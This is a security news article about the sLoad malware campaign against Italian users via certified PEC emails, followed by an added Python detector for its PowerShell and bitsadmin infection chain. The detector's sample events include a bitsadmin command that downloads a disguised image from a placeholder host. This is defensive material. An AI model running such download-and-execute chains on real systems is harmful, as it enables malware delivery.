October 7, 2019 By David Bisson 2 min read

Attackers are leveraging certified emails to target Italian users with samples of the sLoad malware family.

According to Cybaze-Yoroi ZLAB, the sLoad campaign began when criminals used certified emails to target Italian organizations and consultants affiliated with professional associations. Known as posta elettronica certificata (PEC) in Italy, certified emails are essentially normal email messages that come with an added guarantee of the sender’s identity. This verification lulled recipients into a false sense of security and tricked them into opening the attached .ZIP file.

Once opened, the .ZIP archive, unlike those in previous attack campaigns, didn’t hide PowerShell code. Instead, it contained a corrupted PDF document and a VBS script. The first item was meant to convince the recipient that all was well so that they would run the script. If they complied, the script launched a PowerShell script retrieved from the attackers’ infrastructure, which in turn downloaded a malicious .JPG using bitsadmin.exe. This technique helped the campaign evade detection by AV tools. The image file then loaded another PowerShell script that established persistence on the infected machine and used a series of other commands to download the final payload.

A Wave of Attacks Exploiting Posta Elettronica Certificata (PEC)

The sLoad operation isn’t the first attack campaign to involve certified email in some way. In January 2017, My Online Security detected a malspam campaign that used “posta certifica” in the subject line and body of its attack emails. Approximately two years later, researchers at ESET observed DanaBot combing through victims’ inboxes for emails specifically containing the substring “pec,” presumably in an effort to target corporate and public administration emails. Then, in April 2019, Cisco Talos discovered attackers pairing PEC with the JasperLoader downloader to target Italians with the Gootkit banking Trojan.

Help Defend Against sLoad Malware

Security professionals can help their organizations defend against sLoad by moving systems away from a model of escalated privilege access and toward one of least privilege through access management, multifactor authentication (MFA) and other security controls. Employee security awareness training, along with sophisticated security information and event management (SIEM) tools, can help organizations detect and defend against PowerShell attacks.
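As an added defensive example (not from the original article or from Cybaze-Yoroi ZLAB), the chain described above gives a SIEM two process-creation patterns to match on: a Windows script host launching PowerShell, and bitsadmin.exe transferring a URL whose path ends in an image extension. The event records, command lines and hostnames below are constructed for the example.

```python
import re
from typing import Dict, List

# Script hosts that a .VBS attachment like the one in the campaign runs under.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# A remote URL whose path ends in an image extension (the campaign's ".JPG").
IMAGE_URL = re.compile(r"https?://\S+\.(?:jpe?g|png|gif)\b", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect_sload_chain(events: List[Dict[str, str]]) -> List[str]:
    """Return one alert per process-creation event that matches a stage of the
    chain: a script host spawning PowerShell, or bitsadmin.exe transferring a
    URL that ends in an image extension."""
    alerts = []
    for ev in events:
        parent = _basename(ev.get("ParentImage", ""))
        image = _basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        if parent in SCRIPT_HOSTS and image == "powershell.exe":
            alerts.append(f"{parent} spawned powershell.exe: {cmd}")
        if image == "bitsadmin.exe" and "/transfer" in cmd.lower():
            match = IMAGE_URL.search(cmd)
            if match:
                alerts.append(f"bitsadmin.exe (parent {parent}) fetched {match.group(0)}")
    return alerts


# Constructed Sysmon Event ID 1 style records; hostnames are placeholders, not IoCs.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -w hidden -c <stage-one placeholder>"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job1 http://cdn.example.invalid/pic.jpg C:\Users\Public\pic.jpg"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # interactive PowerShell: benign
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",  # bitsadmin fetching a non-image: not matched here
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd http://updates.example.invalid/patch.msi C:\Temp\patch.msi"},
]

if __name__ == "__main__":
    for line in detect_sload_chain(SAMPLE_EVENTS):
        print("ALERT:", line)
```

The fourth record is left unmatched on purpose; an environment that never uses bitsadmin.exe for legitimate downloads can drop the extension check and alert on any /transfer.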
